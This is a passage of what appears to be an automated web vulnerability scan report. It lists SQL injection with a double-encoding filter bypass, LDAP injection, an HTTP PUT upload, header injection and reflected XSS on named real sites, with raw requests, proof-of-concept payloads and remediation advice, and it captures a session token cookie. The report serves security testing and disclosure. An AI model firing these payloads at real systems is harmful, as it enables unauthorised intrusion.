User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /users/login/global/resources/styles/print.css HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:44:04 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
Real-Hostname: townnews365.com
Content-Length: 680
Connection: close
X-Cache-Info: cached

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.83. http://www.townnews365.com/users/manage/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /users/manage/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /users/manage/ HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tncms-authtoken=AULoDZRRVHwG+QY5uBp662RlILilY+otFEFrOPAoQbv+PTkv1TwIuf6JcRjrJv2GNga+Au0Ifo+uBZHcqsxewyk; tncms-screenname=Demo+User; tncms-avatarurl=http%3A%2F%2Fwww.townnews365.com%2Fcontent%2Ftncms%2Favatars%2F6%2Fc9%2F4bd%2F6c94bd0e-d884-11de-85c7-001a4bcf887a.png; __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.8.10.1305412213
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /users/manage/ HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tncms-authtoken=AULoDZRRVHwG+QY5uBp662RlILilY+otFEFrOPAoQbv+PTkv1TwIuf6JcRjrJv2GNga+Au0Ifo+uBZHcqsxewyk; tncms-screenname=Demo+User; tncms-avatarurl=http%3A%2F%2Fwww.townnews365.com%2Fcontent%2Ftncms%2Favatars%2F6%2Fc9%2F4bd%2F6c94bd0e-d884-11de-85c7-001a4bcf887a.png; __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.8.10.1305412213
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 403 Forbidden
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4009304
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:45:40 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.3827
X-PHP-Engine: enabled
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp4
Connection: Keep-Alive
X-Cache-Info: cached
Content-Length: 38975


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href=
...[SNIP]...

3. LDAP injection  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /submissions/

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET /*)(sn=*/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 417 Rate limit exceeded
Content-Type: text/html
Date: Sat, 14 May 2011 22:45:15 GMT
Connection: close
Content-Length: 40

417 Rate limit exceeded for engine pages

Request 2

GET /*)!(sn=*/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

4. HTTP PUT enabled  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://documents.policybazaar.com
Path:   /UploadedImages/200X150_20.swf

Issue detail

HTTP PUT is enabled on the web server. The file /7bf7e2c3c8f3707.txt was uploaded to the server using the PUT verb, and the contents of the file were subsequently retrieved using the GET verb.

Issue background

The HTTP PUT method is used to upload data which is saved on the server at a user-supplied URL. If enabled, an attacker can place arbitrary, and potentially malicious, content into the application. Depending on the server's configuration, this may lead to compromise of other users (by uploading client-executable scripts), compromise of the server (by uploading server-executable code), or other attacks.

Issue remediation

You should refer to your platform's documentation to determine how to disable the HTTP PUT method on the server.

Request 1

PUT /7bf7e2c3c8f3707.txt HTTP/1.0
Host: documents.policybazaar.com
Content-Length: 16

b1727cb94fe741b4

Response 1

HTTP/1.1 201 Created
Connection: close
Date: Sat, 14 May 2011 13:52:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://documents.policybazaar.com/7bf7e2c3c8f3707.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

Request 2

GET /7bf7e2c3c8f3707.txt HTTP/1.0
Host: documents.policybazaar.com

Response 2

HTTP/1.1 200 OK
Content-Length: 16
Content-Type: text/plain
Last-Modified: Sat, 14 May 2011 13:52:12 GMT
Accept-Ranges: bytes
ETag: W/"4c6079203e12cc1:4c50"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 13:52:12 GMT
Connection: close

b1727cb94fe741b4

5. HTTP header injection  previous  next
There are 2 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


5.1. http://ad.doubleclick.net/getcamphist [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /getcamphist

Issue detail

The value of the src request parameter is copied into the Location response header. The payload e26a4%0d%0a4ab8ada7f2f was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

GET /getcamphist;src=1516044;host=metrics.blackberry.com%2Fb%2Fss%2Frimglobal%2Crimbbus%2F1%2FH.22.1%2Fs86852463499098%3FAQB%3D1%26vvpr%3Dtrue%26%26pccr%3Dtrue%26vidn%3D26E74833851D2212-6000010680032FA8%26%26ndh%3D1%26t%3D14%252F4%252F2011%25209%253A23%253A34%25206%2520300%26ns%3Dresearchinmotion%26pageName%3Dus%253Abb%253Aservices%253Aappworld%253ABlackBerry%2520App%2520World%26g%3Dhttp%253A%252F%252Fus.blackberry.com%252Fapps-software%252Fappworld%252F%26vvp%3DDFA%25231516044%253Av32%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dus%253Abb%253Aservices%26events%3Devent8%252Cevent26%252Cevent27%26c1%3Dus%253Abb%253Aservices%253Aappworld%26h1%3Dus%252Cbb%252Cservices%252Cappworld%26v9%3Dus%253Abb%253Aservices%253Aappworld%253ABlackBerry%2520App%2520World%26v10%3Dus%253Abb%253Aservices%26v11%3Dus%253Abb%253Aservices%253Aappworld%253ABlackBerry%2520App%2520World%26v23%3Dus%253Abb%253Aservices%253Aappworld%26c40%3Dhttp%253A%252F%252Fus.blackberry.com%252Fapps-software%252Fappworld%252F%26s%3D1920x1200%26c%3D24%26j%3D1.7%26v%3DY%26k%3DY%26bw%3D1138%26bh%3D941%26p%3DJava%2520Deployment%2520Toolkit%25206.0.240.7%253BGoogle%2520Update%253BJava%28TM%29%2520Platform%2520SE%25206%2520U24%253BSilverlight%2520Plug-In%253BWPI%2520Detector%25201.3%253B%26AQE%3D1e26a4%0d%0a4ab8ada7f2f&A2S=1;ord=1171295170 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://us.blackberry.com/apps-software/appworld/
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://metrics.blackberry.com/b/ss/rimglobal,rimbbus/1/H.22.1/s86852463499098?AQB=1&vvpr=true&&pccr=true&vidn=26E74833851D2212-6000010680032FA8&&ndh=1&t=14%2F4%2F2011%209%3A23%3A34%206%20300&ns=researchinmotion&pageName=us%3Abb%3Aservices%3Aappworld%3ABlackBerry%20App%20World&g=http%3A%2F%2Fus.blackberry.com%2Fapps-software%2Fappworld%2F&vvp=DFA%231516044%3Av32%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=us%3Abb%3Aservices&events=event8%2Cevent26%2Cevent27&c1=us%3Abb%3Aservices%3Aappworld&h1=us%2Cbb%2Cservices%2Cappworld&v9=us%3Abb%3Aservices%3Aappworld%3ABlackBerry%20App%20World&v10=us%3Abb%3Aservices&v11=us%3Abb%3Aservices%3Aappworld%3ABlackBerry%20App%20World&v23=us%3Abb%3Aservices%3Aappworld&c40=http%3A%2F%2Fus.blackberry.com%2Fapps-software%2Fappworld%2F&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1138&bh=941&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1e26a4
4ab8ada7f2f
&A2S=1/respcamphist;src=1516044;ec=nc;rch=2;lastimp=0;lastimptime=0;lis=0;lip=0;lic=0;lir=0;lirv=0;likv=0;lipn=;lastclk=0;lastclktime=0;lcs=0;lcp=0;lcc=0;lcr=0;lcrv=0;lckv=0;lcpn=;ord=1305383042:
Date: Sat, 14 May 2011 14:24:02 GMT
Server: GFE/2.0
Content-Type: text/html


5.2. http://c7.zedo.com/img/bh.gif [a parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /img/bh.gif

Issue detail

The value of the a request parameter is copied into the Set-Cookie response header. The payload 2704a%0d%0a77410563eb8 was submitted in the a parameter. This caused a response containing an injected HTTP header.

Request

GET /img/bh.gif?n=305&g=20&a=2704a%0d%0a77410563eb8&s=1&t=i&cb=782c3a04-0a73-4bac-9a23-840a51099312 HTTP/1.1
Host: c7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712352%26pt1%3D0%26pt2%3D1%26si%3D1&t1=sendEvent&p=2406&c=2&cb=66269283823
Cookie: FFgeo=2241452; FFChanCap=1583B1190,1#675962#675816#812963#816392#675179,2#894866|0,1,1:0,1,1:1,1,1:0,1,1:0,1,1:0,1,1; ZEDOIDX=21; ZEDOIDA=@HD0VAoBADQAAGbr14QAAAAA~050311; FFCap=1583B933,196008,139660:1432,193317|0,1,1:0,1,1:0,8,1; FFcat=1380,6,17:1380,6,5:1380,6,0; FFad=0:0:1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 45
Content-Type: image/gif
Set-Cookie: FFAbh=864B305,20|145_1#365Z2704a
77410563eb8
_1#365;expires=Sun, 13 May 2012 14: 21:38 GMT;domain=.zedo.com;path=/;
ETag: "61ca4793-7054-49420a02cd680"
X-Varnish: 155311604
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=58315
Expires: Sun, 15 May 2011 06:33:33 GMT
Date: Sat, 14 May 2011 14:21:38 GMT
Connection: close

GIF89a.............!.......,...........D..;


6. Cross-site scripting (reflected)  previous  next
There are 54 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


6.1. http://ad.doubleclick.net/adi/N3285.google/B2343920.121 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.121

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89764"-alert(1)-"10cad9e4e1e was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.121;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BFPOLusvOTZa7EYr9lQfE7O3aCpOu__wBy-zLvBmb4YGjV4CIJxABGAEghqSwDDgAUIGjhfIDYMmGhYmIpIQQoAH9pPvoA7IBDWRlYWxjdXJyeS5jb226AQozMDB4MjUwX2FzyAEJ2gEnaHR0cDovL2RlYWxjdXJyeS5jb20vVmVudHVyZUNhcGl0YWwuaHRt4AEC-AEBuAIYwAIByAKLm-ERqAMB0QPYHYd97hHY_-gD1SfoA4kH6AMM6AMH6AObCfUDAAAAxA&num=1&sig=AGiWqtxTWxbTbD7IDVdxoP07yvsaQxID0Q&client=ca-pub-4949689067833404&adurl=89764"-alert(1)-"10cad9e4e1e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4949689067833404&output=html&h=250&slotname=9030308470&w=300&lmt=1305416201&flash=10.3.181&url=http%3A%2F%2Fdealcurry.com%2FVentureCapital.htm&dt=1305398201125&bpp=3&shv=r20110509&jsv=r20110506&prev_slotnames=9653691770&correlator=1305398201191&frm=0&adk=2109740475&ga_vid=1858156238.1305396356&ga_sid=1305398201&ga_hid=1376127525&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1004&bih=945&ref=http%3A%2F%2Fdealcurry.com%2F20110421-PolicyBazaar-Com-Raises-Rs-40-Cr-From-Intel-Cap-Info-Edge.htm&fu=0&ifi=2&dtd=855&xpc=nc6XXTzCiY&p=http%3A//dealcurry.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4808
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 14 May 2011 18:40:18 GMT
Expires: Sat, 14 May 2011 18:40:18 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
L2RlYWxjdXJyeS5jb20vVmVudHVyZUNhcGl0YWwuaHRt4AEC-AEBuAIYwAIByAKLm-ERqAMB0QPYHYd97hHY_-gD1SfoA4kH6AMM6AMH6AObCfUDAAAAxA&num=1&sig=AGiWqtxTWxbTbD7IDVdxoP07yvsaQxID0Q&client=ca-pub-4949689067833404&adurl=89764"-alert(1)-"10cad9e4e1ehttps://www.lowermybills.com/lending/home-refinance/?sourceid=55400189-240104510-41904509");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "false";
var winW = 3
...[SNIP]...

6.2. http://ad.doubleclick.net/adi/N3285.google/B2343920.121 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.121

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7eb9d"-alert(1)-"e1a6f9d16c7 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.121;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BFPOLusvOTZa7EYr9lQfE7O3aCpOu__wBy-zLvBmb4YGjV4CIJxABGAEghqSwDDgAUIGjhfIDYMmGhYmIpIQQoAH9pPvoA7IBDWRlYWxjdXJyeS5jb226AQozMDB4MjUwX2FzyAEJ2gEnaHR0cDovL2RlYWxjdXJyeS5jb20vVmVudHVyZUNhcGl0YWwuaHRt4AEC-AEBuAIYwAIByAKLm-ERqAMB0QPYHYd97hHY_-gD1SfoA4kH6AMM6AMH6AObCfUDAAAAxA7eb9d"-alert(1)-"e1a6f9d16c7&num=1&sig=AGiWqtxTWxbTbD7IDVdxoP07yvsaQxID0Q&client=ca-pub-4949689067833404&adurl=;ord=1730010217? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4949689067833404&output=html&h=250&slotname=9030308470&w=300&lmt=1305416201&flash=10.3.181&url=http%3A%2F%2Fdealcurry.com%2FVentureCapital.htm&dt=1305398201125&bpp=3&shv=r20110509&jsv=r20110506&prev_slotnames=9653691770&correlator=1305398201191&frm=0&adk=2109740475&ga_vid=1858156238.1305396356&ga_sid=1305398201&ga_hid=1376127525&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1004&bih=945&ref=http%3A%2F%2Fdealcurry.com%2F20110421-PolicyBazaar-Com-Raises-Rs-40-Cr-From-Intel-Cap-Info-Edge.htm&fu=0&ifi=2&dtd=855&xpc=nc6XXTzCiY&p=http%3A//dealcurry.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4825
Date: Sat, 14 May 2011 18:37:43 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
IGjhfIDYMmGhYmIpIQQoAH9pPvoA7IBDWRlYWxjdXJyeS5jb226AQozMDB4MjUwX2FzyAEJ2gEnaHR0cDovL2RlYWxjdXJyeS5jb20vVmVudHVyZUNhcGl0YWwuaHRt4AEC-AEBuAIYwAIByAKLm-ERqAMB0QPYHYd97hHY_-gD1SfoA4kH6AMM6AMH6AObCfUDAAAAxA7eb9d"-alert(1)-"e1a6f9d16c7&num=1&sig=AGiWqtxTWxbTbD7IDVdxoP07yvsaQxID0Q&client=ca-pub-4949689067833404&adurl=https%3a%2f%2fwww.lowermybills.com/lending/home-refinance/%3Fsourceid%3D55400189-240104510-42177866");
var wmode = "op
...[SNIP]...

6.3. http://ad.doubleclick.net/adi/N3285.google/B2343920.121 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.121

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc2f3"-alert(1)-"4cadeb1bb5b was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.121;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BFPOLusvOTZa7EYr9lQfE7O3aCpOu__wBy-zLvBmb4YGjV4CIJxABGAEghqSwDDgAUIGjhfIDYMmGhYmIpIQQoAH9pPvoA7IBDWRlYWxjdXJyeS5jb226AQozMDB4MjUwX2FzyAEJ2gEnaHR0cDovL2RlYWxjdXJyeS5jb20vVmVudHVyZUNhcGl0YWwuaHRt4AEC-AEBuAIYwAIByAKLm-ERqAMB0QPYHYd97hHY_-gD1SfoA4kH6AMM6AMH6AObCfUDAAAAxA&num=1&sig=AGiWqtxTWxbTbD7IDVdxoP07yvsaQxID0Q&client=ca-pub-4949689067833404dc2f3"-alert(1)-"4cadeb1bb5b&adurl=;ord=1730010217? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4949689067833404&output=html&h=250&slotname=9030308470&w=300&lmt=1305416201&flash=10.3.181&url=http%3A%2F%2Fdealcurry.com%2FVentureCapital.htm&dt=1305398201125&bpp=3&shv=r20110509&jsv=r20110506&prev_slotnames=9653691770&correlator=1305398201191&frm=0&adk=2109740475&ga_vid=1858156238.1305396356&ga_sid=1305398201&ga_hid=1376127525&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1004&bih=945&ref=http%3A%2F%2Fdealcurry.com%2F20110421-PolicyBazaar-Com-Raises-Rs-40-Cr-From-Intel-Cap-Info-Edge.htm&fu=0&ifi=2&dtd=855&xpc=nc6XXTzCiY&p=http%3A//dealcurry.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4813
Date: Sat, 14 May 2011 18:39:43 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
HR0cDovL2RlYWxjdXJyeS5jb20vVmVudHVyZUNhcGl0YWwuaHRt4AEC-AEBuAIYwAIByAKLm-ERqAMB0QPYHYd97hHY_-gD1SfoA4kH6AMM6AMH6AObCfUDAAAAxA&num=1&sig=AGiWqtxTWxbTbD7IDVdxoP07yvsaQxID0Q&client=ca-pub-4949689067833404dc2f3"-alert(1)-"4cadeb1bb5b&adurl=https%3a%2f%2fwww.lowermybills.com/lending/home-refinance/%3Fsourceid%3D55400189-240104510-42046964");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "fal
...[SNIP]...

6.4. http://ad.doubleclick.net/adi/N3285.google/B2343920.121 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
